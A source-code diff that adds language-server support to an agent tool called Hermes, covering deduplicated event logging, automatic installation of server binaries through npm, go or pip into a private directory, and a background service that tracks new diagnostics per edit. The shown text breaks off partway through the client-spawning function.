+_announced_unavailable: set = set()   # keys: (server_id, binary_path_or_name)
+_announced_no_root: set = set()       # keys: (server_id, file_path)
+_announced_no_server: set = set()     # keys: (server_id,)
+
+
+def _short_path(file_path: str) -> str:
+    """Render *file_path* relative to the cwd when sensible, else absolute.
+
+    Keeps log lines readable for the common case (the user is inside
+    the project they're editing) without emitting brittle ``../../..``
+    chains for the cross-tree case.
+    """
+    if not file_path:
+        return file_path
+    try:
+        rel = os.path.relpath(file_path)
+    except ValueError:
+        return file_path
+    if rel.startswith(".." + os.sep) or rel == "..":
+        return file_path
+    return rel
+
+
+def _emit(server_id: str, level: int, message: str) -> None:
+    event_log.log(level, "lsp[%s] %s", server_id, message)
+
+
+def _announce_once(bucket: set, key: Tuple) -> bool:
+    """Return True if *key* has not been announced for *bucket* yet.
+
+    Atomically marks the key as announced so concurrent callers
+    cannot both win the race and double-log.
+    """
+    with _announce_lock:
+        if key in bucket:
+            return False
+        bucket.add(key)
+        return True
+
+
+# ---------------------------------------------------------------------------
+# Public event helpers — call these from the LSP layer.
+# ---------------------------------------------------------------------------
+
+
+def log_clean(server_id: str, file_path: str) -> None:
+    """No diagnostics emitted for *file_path*.  DEBUG (silent at default)."""
+    _emit(server_id, logging.DEBUG, f"clean ({_short_path(file_path)})")
+
+
+def log_disabled(server_id: str, file_path: str, reason: str) -> None:
+    """LSP intentionally skipped for this file (feature off, ext unmapped,
+    backend not local, etc.).  DEBUG."""
+    _emit(server_id, logging.DEBUG, f"skipped: {reason} ({_short_path(file_path)})")
+
+
+def log_active(server_id: str, workspace_root: str) -> None:
+    """A new LSP client started for (server_id, workspace_root).
+
+    INFO once per (server_id, workspace_root); DEBUG thereafter.
+    Lets users verify "is LSP actually running?" with a single grep.
+    """
+    key = (server_id, workspace_root)
+    if _announce_once(_announced_active, key):
+        _emit(server_id, logging.INFO, f"active for {workspace_root}")
+    else:
+        _emit(server_id, logging.DEBUG, f"reused client for {workspace_root}")
+
+
+def log_diagnostics(server_id: str, file_path: str, count: int) -> None:
+    """Diagnostics arrived for a file.  INFO every time — these are the
+    failure signals users actually want to grep for, and they are
+    inherently rare per edit."""
+    _emit(server_id, logging.INFO, f"{count} diags ({_short_path(file_path)})")
+
+
+def log_no_project_root(server_id: str, file_path: str) -> None:
+    """File had no recognised project marker.  INFO once per file,
+    DEBUG thereafter."""
+    key = (server_id, file_path)
+    if _announce_once(_announced_no_root, key):
+        _emit(server_id, logging.INFO, f"no project root for {_short_path(file_path)}")
+    else:
+        _emit(server_id, logging.DEBUG, f"no project root for {_short_path(file_path)}")
+
+
+def log_server_unavailable(server_id: str, binary_or_pkg: str) -> None:
+    """The server binary couldn't be resolved.  WARNING once per
+    (server_id, binary), DEBUG thereafter so a hundred subsequent
+    .py edits don't spam the log."""
+    key = (server_id, binary_or_pkg)
+    if _announce_once(_announced_unavailable, key):
+        _emit(
+            server_id,
+            logging.WARNING,
+            f"server unavailable: {binary_or_pkg} not found "
+            "(install via `hermes lsp install <id>` or set lsp.servers.<id>.command)",
+        )
+    else:
+        _emit(server_id, logging.DEBUG, f"server still unavailable: {binary_or_pkg}")
+
+
+def log_no_server_configured(server_id: str) -> None:
+    """No spawn recipe for this language.  WARNING once."""
+    if _announce_once(_announced_no_server, (server_id,)):
+        _emit(server_id, logging.WARNING, "no server configured")
+
+
+def log_timeout(server_id: str, file_path: str, kind: str = "diagnostics") -> None:
+    """A request to the server timed out.  WARNING every time — these are
+    inherently novel events worth surfacing on each occurrence."""
+    _emit(
+        server_id,
+        logging.WARNING,
+        f"{kind} timed out for {_short_path(file_path)}",
+    )
+
+
+def log_server_error(server_id: str, file_path: str, exc: BaseException) -> None:
+    """An unexpected exception bubbled out of the LSP layer.  WARNING."""
+    _emit(
+        server_id,
+        logging.WARNING,
+        f"unexpected error for {_short_path(file_path)}: {type(exc).__name__}: {exc}",
+    )
+
+
+def log_spawn_failed(server_id: str, workspace_root: str, exc: BaseException) -> None:
+    """The LSP server failed to spawn or initialize.  WARNING."""
+    _emit(
+        server_id,
+        logging.WARNING,
+        f"spawn/initialize failed for {workspace_root}: {type(exc).__name__}: {exc}",
+    )
+
+
+def reset_announce_caches() -> None:
+    """Test-only: clear the dedup caches.  Production code never calls this."""
+    with _announce_lock:
+        _announced_active.clear()
+        _announced_unavailable.clear()
+        _announced_no_root.clear()
+        _announced_no_server.clear()
+
+
+__all__ = [
+    "event_log",
+    "log_clean",
+    "log_disabled",
+    "log_active",
+    "log_diagnostics",
+    "log_no_project_root",
+    "log_server_unavailable",
+    "log_no_server_configured",
+    "log_timeout",
+    "log_server_error",
+    "log_spawn_failed",
+    "reset_announce_caches",
+]
diff --git a/agent/lsp/install.py b/agent/lsp/install.py
new file mode 100644
index 00000000000..5b5717dc014
--- /dev/null
+++ b/agent/lsp/install.py
@@ -0,0 +1,347 @@
+"""Auto-installation of LSP server binaries.
+
+Tries to install missing servers using whatever package manager is
+appropriate.  All installs go to a Hermes-owned bin staging dir,
+``<HERMES_HOME>/lsp/bin/``, so we don't pollute the user's global
+toolchain.
+
+Strategies:
+
+- ``auto`` — attempt to install with the best available package
+  manager.  This is the default.
+- ``manual`` — never install; if a binary is missing, the server is
+  silently skipped and the user is told about it via ``hermes lsp
+  status``.
+- ``off`` — same as ``manual`` for now (kept distinct so we can
+  evolve behavior later, e.g. logging differently).
+
+The actual installs happen synchronously the first time a server is
+needed and concurrent calls to :func:`try_install` for the same
+package are deduplicated via a per-package lock.
+
+Failure modes are non-fatal: every install path is wrapped in
+try/except and returns ``None`` on failure.  The tool layer then
+falls back to its in-process syntax checker, exactly as if the user
+hadn't enabled LSP at all.
+"""
+from __future__ import annotations
+
+import logging
+import os
+import shutil
+import subprocess
+import sys
+import threading
+from pathlib import Path
+from typing import Dict, Optional
+
+logger = logging.getLogger("agent.lsp.install")
+
+# Package-name → install-strategy hint registry.  Each entry is a
+# tuple of strategy name + package name + executable name.  When the
+# install completes, we look for the executable in
+# ``<HERMES_HOME>/lsp/bin/`` first, then on PATH.
+INSTALL_RECIPES: Dict[str, Dict[str, str]] = {
+    # Python
+    "pyright": {"strategy": "npm", "pkg": "pyright", "bin": "pyright-langserver"},
+    # JS/TS family
+    "typescript-language-server": {
+        "strategy": "npm",
+        "pkg": "typescript-language-server",
+        "bin": "typescript-language-server",
+    },
+    "@vue/language-server": {
+        "strategy": "npm",
+        "pkg": "@vue/language-server",
+        "bin": "vue-language-server",
+    },
+    "svelte-language-server": {
+        "strategy": "npm",
+        "pkg": "svelte-language-server",
+        "bin": "svelteserver",
+    },
+    "@astrojs/language-server": {
+        "strategy": "npm",
+        "pkg": "@astrojs/language-server",
+        "bin": "astro-ls",
+    },
+    "yaml-language-server": {
+        "strategy": "npm",
+        "pkg": "yaml-language-server",
+        "bin": "yaml-language-server",
+    },
+    "bash-language-server": {
+        "strategy": "npm",
+        "pkg": "bash-language-server",
+        "bin": "bash-language-server",
+    },
+    "intelephense": {"strategy": "npm", "pkg": "intelephense", "bin": "intelephense"},
+    "dockerfile-language-server-nodejs": {
+        "strategy": "npm",
+        "pkg": "dockerfile-language-server-nodejs",
+        "bin": "docker-langserver",
+    },
+    # Go
+    "gopls": {"strategy": "go", "pkg": "golang.org/x/tools/gopls@latest", "bin": "gopls"},
+    # Rust — too heavy (hundreds of MB to bootstrap).  We do NOT
+    # auto-install rust-analyzer; users install via rustup.
+    "rust-analyzer": {"strategy": "manual", "pkg": "", "bin": "rust-analyzer"},
+    # C/C++ — manual (clangd ships with LLVM, very heavy)
+    "clangd": {"strategy": "manual", "pkg": "", "bin": "clangd"},
+    # Lua — manual (LuaLS is platform-specific binaries from GitHub
+    # releases; complex enough that we punt to the user)
+    "lua-language-server": {"strategy": "manual", "pkg": "", "bin": "lua-language-server"},
+}
+
+
+_install_locks: Dict[str, threading.Lock] = {}
+_install_results: Dict[str, Optional[str]] = {}
+_install_lock_meta = threading.Lock()
+
+
+def hermes_lsp_bin_dir() -> Path:
+    """Return the Hermes-owned bin staging dir for LSP servers."""
+    home = os.environ.get("HERMES_HOME")
+    if home is None:
+        home = os.path.join(os.path.expanduser("~"), ".hermes")
+    p = Path(home) / "lsp" / "bin"
+    p.mkdir(parents=True, exist_ok=True)
+    return p
+
+
+def _existing_binary(name: str) -> Optional[str]:
+    """Probe the staging dir + PATH for a binary named ``name``."""
+    staged = hermes_lsp_bin_dir() / name
+    if staged.exists() and os.access(staged, os.X_OK):
+        return str(staged)
+    on_path = shutil.which(name)
+    if on_path:
+        return on_path
+    return None
+
+
+def _get_lock(pkg: str) -> threading.Lock:
+    with _install_lock_meta:
+        lock = _install_locks.get(pkg)
+        if lock is None:
+            lock = threading.Lock()
+            _install_locks[pkg] = lock
+        return lock
+
+
+def try_install(pkg: str, strategy: str = "auto") -> Optional[str]:
+    """Try to install ``pkg`` and return the binary path if successful.
+
+    ``strategy`` is ``"auto"``, ``"manual"``, or ``"off"``.  In
+    ``manual``/``off`` mode, this function only probes for an
+    existing binary and returns ``None`` if not found.
+
+    The install is cached per-package — a second call returns the
+    same path (or ``None``) without reinstalling.  Concurrent calls
+    are serialized.
+    """
+    if strategy not in ("auto",):
+        # Only ``auto`` triggers an actual install.  In manual/off,
+        # we still check whether the binary already exists.
+        recipe = INSTALL_RECIPES.get(pkg, {})
+        bin_name = recipe.get("bin", pkg)
+        return _existing_binary(bin_name)
+
+    if pkg in _install_results:
+        return _install_results[pkg]
+
+    lock = _get_lock(pkg)
+    with lock:
+        # Double-check after acquiring lock.
+        if pkg in _install_results:
+            return _install_results[pkg]
+        result = _do_install(pkg)
+        _install_results[pkg] = result
+        return result
+
+
+def _do_install(pkg: str) -> Optional[str]:
+    recipe = INSTALL_RECIPES.get(pkg)
+    if recipe is None:
+        # Not in our registry — best-effort: just probe PATH.
+        return shutil.which(pkg)
+
+    strategy = recipe.get("strategy", "manual")
+    bin_name = recipe.get("bin", pkg)
+
+    # Check if already present (shutil.which or staging dir)
+    existing = _existing_binary(bin_name)
+    if existing:
+        return existing
+
+    if strategy == "manual":
+        logger.debug("[install] %s requires manual install (recipe=%s)", pkg, recipe)
+        return None
+
+    if strategy == "npm":
+        return _install_npm(recipe.get("pkg", pkg), bin_name)
+    if strategy == "go":
+        return _install_go(recipe.get("pkg", pkg), bin_name)
+    if strategy == "pip":
+        return _install_pip(recipe.get("pkg", pkg), bin_name)
+
+    logger.warning("[install] unknown strategy %r for %s", strategy, pkg)
+    return None
+
+
+def _install_npm(pkg: str, bin_name: str) -> Optional[str]:
+    """Install an npm package into our staging dir.
+
+    Uses ``npm install --prefix`` so the binaries land in
+    ``<staging>/node_modules/.bin/<bin_name>`` and we symlink them up
+    one level for direct PATH-style access.
+    """
+    npm = shutil.which("npm")
+    if npm is None:
+        logger.info("[install] cannot install %s: npm not on PATH", pkg)
+        return None
+    staging = hermes_lsp_bin_dir().parent  # <HERMES_HOME>/lsp/
+    try:
+        logger.info("[install] npm install --prefix %s %s", staging, pkg)
+        proc = subprocess.run(
+            [npm, "install", "--prefix", str(staging), "--silent", "--no-fund", "--no-audit", pkg],
+            check=False,
+            capture_output=True,
+            text=True,
+            timeout=300,
+        )
+        if proc.returncode != 0:
+            logger.warning(
+                "[install] npm install failed for %s: %s", pkg, proc.stderr.strip()[:500]
+            )
+            return None
+    except (subprocess.TimeoutExpired, OSError) as e:
+        logger.warning("[install] npm install errored for %s: %s", pkg, e)
+        return None
+
+    # Find the bin
+    nm_bin = staging / "node_modules" / ".bin" / bin_name
+    if os.name == "nt":
+        # On Windows npm sometimes drops `.cmd` shims
+        candidates = [nm_bin, nm_bin.with_suffix(".cmd")]
+    else:
+        candidates = [nm_bin]
+    for c in candidates:
+        if c.exists():
+            # Symlink into our `lsp/bin/` for stable PATH access.
+            link = hermes_lsp_bin_dir() / c.name
+            if not link.exists():
+                try:
+                    link.symlink_to(c)
+                except (OSError, NotImplementedError):
+                    # Symlinks fail on some Windows setups — copy instead.
+                    try:
+                        shutil.copy2(c, link)
+                    except OSError:
+                        return str(c)
+            return str(link if link.exists() else c)
+    logger.warning("[install] npm install for %s succeeded but bin %s not found", pkg, bin_name)
+    return None
+
+
+def _install_go(pkg: str, bin_name: str) -> Optional[str]:
+    """Install a Go module to GOBIN=<staging>."""
+    go = shutil.which("go")
+    if go is None:
+        logger.info("[install] cannot install %s: go not on PATH", pkg)
+        return None
+    staging = hermes_lsp_bin_dir()
+    env = dict(os.environ)
+    env["GOBIN"] = str(staging)
+    try:
+        logger.info("[install] go install %s (GOBIN=%s)", pkg, staging)
+        proc = subprocess.run(
+            [go, "install", pkg],
+            check=False,
+            capture_output=True,
+            text=True,
+            timeout=600,
+            env=env,
+        )
+        if proc.returncode != 0:
+            logger.warning(
+                "[install] go install failed for %s: %s", pkg, proc.stderr.strip()[:500]
+            )
+            return None
+    except (subprocess.TimeoutExpired, OSError) as e:
+        logger.warning("[install] go install errored for %s: %s", pkg, e)
+        return None
+    bin_path = staging / bin_name
+    if os.name == "nt":
+        bin_path = bin_path.with_suffix(".exe")
+    if bin_path.exists():
+        return str(bin_path)
+    logger.warning("[install] go install for %s succeeded but bin %s not found", pkg, bin_name)
+    return None
+
+
+def _install_pip(pkg: str, bin_name: str) -> Optional[str]:
+    """Install a Python package into a hermes-owned target dir.
+
+    We avoid polluting the user's site-packages by using
+    ``pip install --target``.  Bins go into
+    ``<staging>/python-packages/bin/`` which we symlink into
+    ``<staging>/bin``.  Note: this only works for packages that ship a
+    console script.
+    """
+    pip_target = hermes_lsp_bin_dir().parent / "python-packages"
+    pip_target.mkdir(parents=True, exist_ok=True)
+    try:
+        logger.info("[install] pip install --target %s %s", pip_target, pkg)
+        proc = subprocess.run(
+            [sys.executable, "-m", "pip", "install", "--target", str(pip_target), "--quiet", pkg],
+            check=False,
+            capture_output=True,
+            text=True,
+            timeout=300,
+        )
+        if proc.returncode != 0:
+            logger.warning(
+                "[install] pip install failed for %s: %s", pkg, proc.stderr.strip()[:500]
+            )
+            return None
+    except (subprocess.TimeoutExpired, OSError) as e:
+        logger.warning("[install] pip install errored for %s: %s", pkg, e)
+        return None
+    # Look for the script
+    bin_path = pip_target / "bin" / bin_name
+    if bin_path.exists():
+        link = hermes_lsp_bin_dir() / bin_name
+        if not link.exists():
+            try:
+                link.symlink_to(bin_path)
+            except (OSError, NotImplementedError):
+                try:
+                    shutil.copy2(bin_path, link)
+                except OSError:
+                    return str(bin_path)
+        return str(link if link.exists() else bin_path)
+    return None
+
+
+def detect_status(pkg: str) -> str:
+    """Return ``installed``, ``missing``, or ``manual-only`` for a package.
+
+    Used by the ``hermes lsp status`` CLI to give users a quick
+    overview of what's available without spawning anything.
+    """
+    recipe = INSTALL_RECIPES.get(pkg)
+    bin_name = recipe.get("bin", pkg) if recipe else pkg
+    if _existing_binary(bin_name):
+        return "installed"
+    if recipe and recipe.get("strategy") == "manual":
+        return "manual-only"
+    return "missing"
+
+
+__all__ = [
+    "INSTALL_RECIPES",
+    "try_install",
+    "detect_status",
+    "hermes_lsp_bin_dir",
+]
diff --git a/agent/lsp/manager.py b/agent/lsp/manager.py
new file mode 100644
index 00000000000..a0d3eb98c30
--- /dev/null
+++ b/agent/lsp/manager.py
@@ -0,0 +1,607 @@
+"""Service-level orchestration for LSP clients.
+
+The :class:`LSPService` is the bridge between the synchronous
+file_operations layer and the async :class:`agent.lsp.client.LSPClient`.
+
+Design choices:
+
+- A **single asyncio event loop** runs in a background thread.  All
+  client work happens on that loop.  Synchronous callers from
+  ``tools/file_operations.py`` use :meth:`get_diagnostics_sync` to
+  open + wait + drain in one blocking call.
+
+- One client per ``(server_id, workspace_root)`` key.  Lazy spawn:
+  the first request for a key spawns the client; subsequent requests
+  re-use it.
+
+- A **broken-set** records ``(server_id, workspace_root)`` pairs that
+  failed to spawn or initialize.  These are never retried for the
+  life of the service.  Mirrors OpenCode's design.
+
+- A **delta baseline** map keeps "diagnostics-as-of-the-last-snapshot"
+  per file.  ``snapshot_baseline()`` is called BEFORE a write; the
+  next ``get_diagnostics_sync()`` returns only diagnostics that
+  weren't in the baseline.  This is the lift from Claude Code's
+  ``beforeFileEdited`` / ``getNewDiagnostics`` pattern, except wired
+  to the local LSP layer instead of MCP IDE RPC.
+
+The service is **off by default** — call :meth:`is_active` to check
+whether it's actually doing anything.  When LSP is disabled in
+config, when no git workspace can be detected, when all configured
+servers are missing binaries and auto-install is off, ``is_active``
+returns False and the file_operations layer falls through to the
+in-process syntax check.
+"""
+from __future__ import annotations
+
+import asyncio
+import logging
+import os
+import threading
+import time
+from concurrent.futures import Future as ConcurrentFuture
+from typing import Any, Dict, List, Optional, Tuple
+
+from agent.lsp import eventlog
+from agent.lsp.client import (
+    DIAGNOSTICS_DOCUMENT_WAIT,
+    LSPClient,
+    file_uri,
+)
+from agent.lsp.servers import (
+    ServerContext,
+    ServerDef,
+    SpawnSpec,
+    find_server_for_file,
+    language_id_for,
+)
+from agent.lsp.workspace import (
+    clear_cache,
+    is_inside_workspace,
+    resolve_workspace_for_file,
+)
+
+logger = logging.getLogger("agent.lsp.manager")
+
+DEFAULT_IDLE_TIMEOUT = 600  # seconds; servers idle for >10min get reaped
+
+
+class _BackgroundLoop:
+    """A daemon thread that owns one asyncio event loop.
+
+    Provides :meth:`run` for synchronous callers — submits a coroutine
+    to the loop and blocks until it finishes (or a timeout fires).
+    """
+
+    def __init__(self) -> None:
+        self._loop: Optional[asyncio.AbstractEventLoop] = None
+        self._thread: Optional[threading.Thread] = None
+        self._ready = threading.Event()
+
+    def start(self) -> None:
+        if self._thread is not None:
+            return
+        self._thread = threading.Thread(
+            target=self._run_forever,
+            name="hermes-lsp-loop",
+            daemon=True,
+        )
+        self._thread.start()
+        self._ready.wait(timeout=5.0)
+
+    def _run_forever(self) -> None:
+        loop = asyncio.new_event_loop()
+        self._loop = loop
+        asyncio.set_event_loop(loop)
+        self._ready.set()
+        try:
+            loop.run_forever()
+        finally:
+            try:
+                loop.close()
+            except Exception:  # noqa: BLE001
+                pass
+
+    def run(self, coro, *, timeout: Optional[float] = None) -> Any:
+        """Submit a coroutine to the loop and block until done.
+
+        Returns the coroutine's result, or raises its exception.
+        """
+        if self._loop is None:
+            raise RuntimeError("background loop not started")
+        fut: ConcurrentFuture = asyncio.run_coroutine_threadsafe(coro, self._loop)
+        try:
+            return fut.result(timeout=timeout)
+        except Exception:
+            fut.cancel()
+            raise
+
+    def stop(self) -> None:
+        loop = self._loop
+        if loop is None:
+            return
+        try:
+            loop.call_soon_threadsafe(loop.stop)
+        except RuntimeError:
+            pass
+        if self._thread is not None:
+            self._thread.join(timeout=2.0)
+        self._loop = None
+        self._thread = None
+
+
+class LSPService:
+    """The process-wide LSP service.
+
+    Created once via :meth:`create_from_config`; the
+    :func:`agent.lsp.get_service` accessor manages the singleton.
+    Most callers should use that accessor rather than constructing
+    :class:`LSPService` directly.
+    """
+
+    # ------------------------------------------------------------------
+    # construction + factory
+    # ------------------------------------------------------------------
+
+    def __init__(
+        self,
+        *,
+        enabled: bool,
+        wait_mode: str,
+        wait_timeout: float,
+        install_strategy: str,
+        binary_overrides: Optional[Dict[str, List[str]]] = None,
+        env_overrides: Optional[Dict[str, Dict[str, str]]] = None,
+        init_overrides: Optional[Dict[str, Dict[str, Any]]] = None,
+        disabled_servers: Optional[List[str]] = None,
+        idle_timeout: float = DEFAULT_IDLE_TIMEOUT,
+    ) -> None:
+        self._enabled = enabled
+        self._wait_mode = wait_mode if wait_mode in ("document", "full") else "document"
+        self._wait_timeout = wait_timeout
+        self._install_strategy = install_strategy
+        self._binary_overrides = binary_overrides or {}
+        self._env_overrides = env_overrides or {}
+        self._init_overrides = init_overrides or {}
+        self._disabled_servers = set(disabled_servers or [])
+        self._idle_timeout = idle_timeout
+
+        self._loop = _BackgroundLoop()
+        if self._enabled:
+            self._loop.start()
+
+        # Per-(server_id, workspace_root) state
+        self._clients: Dict[Tuple[str, str], LSPClient] = {}
+        self._broken: set = set()
+        self._spawning: Dict[Tuple[str, str], asyncio.Future] = {}
+        self._last_used: Dict[Tuple[str, str], float] = {}
+        self._state_lock = threading.Lock()
+
+        # Delta baseline: file path → snapshot of diagnostics taken
+        # immediately before a write.  ``get_diagnostics_sync`` filters
+        # out anything in the baseline so the agent only sees errors
+        # introduced by the current edit.
+        self._delta_baseline: Dict[str, List[Dict[str, Any]]] = {}
+
+    @classmethod
+    def create_from_config(cls) -> Optional["LSPService"]:
+        """Build a service from ``hermes_cli.config`` settings.
+
+        Returns ``None`` if the config can't be loaded.  The service
+        itself returns ``is_active()`` False when LSP is disabled.
+        """
+        try:
+            from hermes_cli.config import load_config
+            cfg = load_config()
+        except Exception as e:  # noqa: BLE001
+            logger.debug("LSP config load failed: %s", e)
+            return None
+
+        lsp_cfg = (cfg.get("lsp") or {}) if isinstance(cfg, dict) else {}
+        if not isinstance(lsp_cfg, dict):
+            lsp_cfg = {}
+
+        enabled = bool(lsp_cfg.get("enabled", True))
+        wait_mode = lsp_cfg.get("wait_mode", "document")
+        wait_timeout = float(lsp_cfg.get("wait_timeout", DIAGNOSTICS_DOCUMENT_WAIT))
+        install_strategy = lsp_cfg.get("install_strategy", "auto")
+        servers_cfg = lsp_cfg.get("servers") or {}
+        disabled = []
+        binary_overrides: Dict[str, List[str]] = {}
+        env_overrides: Dict[str, Dict[str, str]] = {}
+        init_overrides: Dict[str, Dict[str, Any]] = {}
+        if isinstance(servers_cfg, dict):
+            for name, sub in servers_cfg.items():
+                if not isinstance(sub, dict):
+                    continue
+                if sub.get("disabled"):
+                    disabled.append(name)
+                cmd = sub.get("command")
+                if isinstance(cmd, list) and cmd:
+                    binary_overrides[name] = cmd
+                env = sub.get("env")
+                if isinstance(env, dict):
+                    env_overrides[name] = {k: str(v) for k, v in env.items()}
+                init = sub.get("initialization_options")
+                if isinstance(init, dict):
+                    init_overrides[name] = init
+
+        return cls(
+            enabled=enabled,
+            wait_mode=wait_mode,
+            wait_timeout=wait_timeout,
+            install_strategy=install_strategy,
+            binary_overrides=binary_overrides,
+            env_overrides=env_overrides,
+            init_overrides=init_overrides,
+            disabled_servers=disabled,
+        )
+
+    # ------------------------------------------------------------------
+    # public API
+    # ------------------------------------------------------------------
+
+    def is_active(self) -> bool:
+        """Return True iff this service should be consulted at all."""
+        return self._enabled
+
+    def enabled_for(self, file_path: str) -> bool:
+        """Return True iff LSP should run for this specific file.
+
+        Gates on workspace detection (file or cwd inside a git worktree),
+        on whether any registered server matches the extension, and
+        on whether the (server_id, workspace_root) pair is in the
+        broken-set from a previous spawn failure.
+
+        Files in already-broken pairs return False so the file_operations
+        layer skips the LSP path entirely — no spawn attempts, no
+        timeout cost — until the service is restarted (``hermes lsp
+        restart``) or the process exits.
+        """
+        if not self._enabled:
+            return False
+        srv = find_server_for_file(file_path)
+        if srv is None or srv.server_id in self._disabled_servers:
+            return False
+        ws_root, gated_in = resolve_workspace_for_file(file_path)
+        if not (ws_root and gated_in):
+            return False
+        # Broken-set short-circuit.  Use the per-server root if we can
+        # compute one cheaply; otherwise fall back to the workspace
+        # root as the broken key (which is what _get_or_spawn would
+        # have used anyway when it failed).
+        try:
+            per_server_root = srv.resolve_root(file_path, ws_root) or ws_root
+        except Exception:  # noqa: BLE001
+            per_server_root = ws_root
+        if (srv.server_id, per_server_root) in self._broken:
+            return False
+        return True
+
+    def snapshot_baseline(self, file_path: str) -> None:
+        """Snapshot current diagnostics for ``file_path`` as the delta baseline.
+
+        Called BEFORE a write so the next ``get_diagnostics_sync()``
+        can filter out pre-existing errors.  Best-effort — failures
+        are silently swallowed so a flaky server can't break a write.
+
+        Outer timeouts (e.g. server hangs during initialize) mark the
+        (server_id, workspace_root) pair as broken so subsequent edits
+        skip it instantly instead of re-paying the timeout cost.
+        """
+        if not self.enabled_for(file_path):
+            return
+        try:
+            diags = self._loop.run(self._snapshot_async(file_path), timeout=8.0)
+            self._delta_baseline[os.path.abspath(file_path)] = diags or []
+        except Exception as e:  # noqa: BLE001
+            logger.debug("baseline snapshot failed for %s: %s", file_path, e)
+            self._mark_broken_for_file(file_path, e)
+            self._delta_baseline[os.path.abspath(file_path)] = []
+
+    def get_diagnostics_sync(
+        self,
+        file_path: str,
+        *,
+        delta: bool = True,
+        timeout: Optional[float] = None,
+    ) -> List[Dict[str, Any]]:
+        """Synchronously open ``file_path`` in the right server, wait for
+        diagnostics, return them.
+
+        If ``delta`` is True (default), the result is filtered against
+        any baseline previously captured via :meth:`snapshot_baseline`.
+        Diagnostics present in the baseline are removed so the caller
+        only sees errors introduced by the current edit.
+
+        Returns an empty list when LSP is disabled, when no workspace
+        can be detected, when no server matches, or when the server
+        can't be spawned.  Never raises.
+        """
+        if not self.enabled_for(file_path):
+            return []
+
+        # Resolve server_id eagerly so we can emit structured logs even
+        # when the request errors out below.
+        srv = find_server_for_file(file_path)
+        server_id = srv.server_id if srv else "?"
+
+        try:
+            t = timeout if timeout is not None else self._wait_timeout + 2.0
+            diags = self._loop.run(self._open_and_wait_async(file_path), timeout=t) or []
+        except asyncio.TimeoutError as e:
+            eventlog.log_timeout(server_id, file_path)
+            logger.debug("LSP diagnostics timeout for %s: %s", file_path, e)
+            self._mark_broken_for_file(file_path, e)
+            return []
+        except Exception as e:  # noqa: BLE001
+            eventlog.log_server_error(server_id, file_path, e)
+            logger.debug("LSP diagnostics fetch failed for %s: %s", file_path, e)
+            self._mark_broken_for_file(file_path, e)
+            return []
+
+        abs_path = os.path.abspath(file_path)
+        if delta:
+            baseline = self._delta_baseline.get(abs_path) or []
+            if baseline:
+                seen = {_diag_key(d) for d in baseline}
+                diags = [d for d in diags if _diag_key(d) not in seen]
+            # Roll baseline forward — next call returns deltas relative
+            # to the just-emitted state, mirroring claude-code's
+            # diagnosticTracking.
+            try:
+                fresh = self._loop.run(self._current_diags_async(file_path), timeout=2.0) or []
+            except Exception:  # noqa: BLE001
+                fresh = []
+            if fresh:
+                self._delta_baseline[abs_path] = fresh
+
+        if diags:
+            eventlog.log_diagnostics(server_id, file_path, len(diags))
+        else:
+            eventlog.log_clean(server_id, file_path)
+        return diags
+
+    def _mark_broken_for_file(self, file_path: str, exc: BaseException) -> None:
+        """Mark the (server_id, workspace_root) pair as broken so subsequent
+        edits skip it instantly instead of re-paying timeout cost.
+
+        Called when the outer ``_loop.run`` timeout cancels an in-flight
+        spawn/initialize that the inner ``_get_or_spawn`` task was still
+        holding open.  Without this, every subsequent write would re-enter
+        the spawn path and re-pay the full ``snapshot_baseline``
+        timeout (8s) until the binary is fixed.
+
+        Also kills any orphan client process that survived the cancelled
+        future, and emits a single eventlog WARNING so the user knows
+        which server gave up.
+
+        ``exc`` is whatever exception the outer wrapper caught — used
+        only for logging, never re-raised.
+        """
+        srv = find_server_for_file(file_path)
+        if srv is None:
+            return
+        ws_root, gated = resolve_workspace_for_file(file_path)
+        if not (ws_root and gated):
+            return
+        try:
+            per_server_root = srv.resolve_root(file_path, ws_root) or ws_root
+        except Exception:  # noqa: BLE001
+            per_server_root = ws_root
+        key = (srv.server_id, per_server_root)
+        already_broken = key in self._broken
+        self._broken.add(key)
+
+        # Kill any client we managed to spawn before the timeout.  The
+        # cancelled future never reached the broken-set add inside
+        # ``_get_or_spawn`` so the client may still be hanging in
+        # ``_clients`` with a half-initialized state.
+        with self._state_lock:
+            client = self._clients.pop(key, None)
+        if client is not None:
+            try:
+                # Fire-and-forget shutdown — give it a second to cleanup,
+                # but don't block.  We're already on a slow path.
+                self._loop.run(client.shutdown(), timeout=1.0)
+            except Exception:  # noqa: BLE001
+                pass
+
+        if not already_broken:
+            eventlog.log_spawn_failed(srv.server_id, per_server_root, exc)
+
+    def shutdown(self) -> None:
+        """Tear down all clients and stop the background loop."""
+        if not self._enabled:
+            return
+        try:
+            self._loop.run(self._shutdown_async(), timeout=10.0)
+        except Exception as e:  # noqa: BLE001
+            logger.debug("LSP shutdown error: %s", e)
+        self._loop.stop()
+        clear_cache()
+
+    # ------------------------------------------------------------------
+    # async internals
+    # ------------------------------------------------------------------
+
+    async def _snapshot_async(self, file_path: str) -> List[Dict[str, Any]]:
+        client = await self._get_or_spawn(file_path)
+        if client is None:
+            return []
+        try:
+            version = await client.open_file(file_path, language_id=language_id_for(file_path))
+            await client.wait_for_diagnostics(file_path, version, mode=self._wait_mode)
+        except Exception as e:  # noqa: BLE001
+            logger.debug("snapshot open/wait failed: %s", e)
+            return []
+        self._last_used[(client.server_id, client.workspace_root)] = time.time()
+        return list(client.diagnostics_for(file_path))
+
+    async def _open_and_wait_async(self, file_path: str) -> List[Dict[str, Any]]:
+        client = await self._get_or_spawn(file_path)
+        if client is None:
+            return []
+        try:
+            version = await client.open_file(file_path, language_id=language_id_for(file_path))
+            await client.save_file(file_path)
+            await client.wait_for_diagnostics(file_path, version, mode=self._wait_mode)
+        except Exception as e:  # noqa: BLE001
+            logger.debug("open/wait failed for %s: %s", file_path, e)
+            return []
+        self._last_used[(client.server_id, client.workspace_root)] = time.time()
+        return list(client.diagnostics_for(file_path))
+
+    async def _current_diags_async(self, file_path: str) -> List[Dict[str, Any]]:
+        ws, gated = resolve_workspace_for_file(file_path)
+        srv = find_server_for_file(file_path)
+        if not (ws and gated and srv):
+            return []
+        with self._state_lock:
+            client = self._clients.get((srv.server_id, ws))
+        if client is None:
+            return []
+        return list(client.diagnostics_for(file_path))
+
+    async def _get_or_spawn(self, file_path: str) -> Optional[LSPClient]:
+        srv = find_server_for_file(file_path)
+        if srv is None:
+            return None
+        if srv.server_id in self._disabled_servers:
+            eventlog.log_disabled(srv.server_id, file_path, "disabled in config")
+            return None
+        ws_root, gated = resolve_workspace_for_file(file_path)
+        if not (ws_root and gated):
+            eventlog.log_no_project_root(srv.server_id, file_path)
+            return None
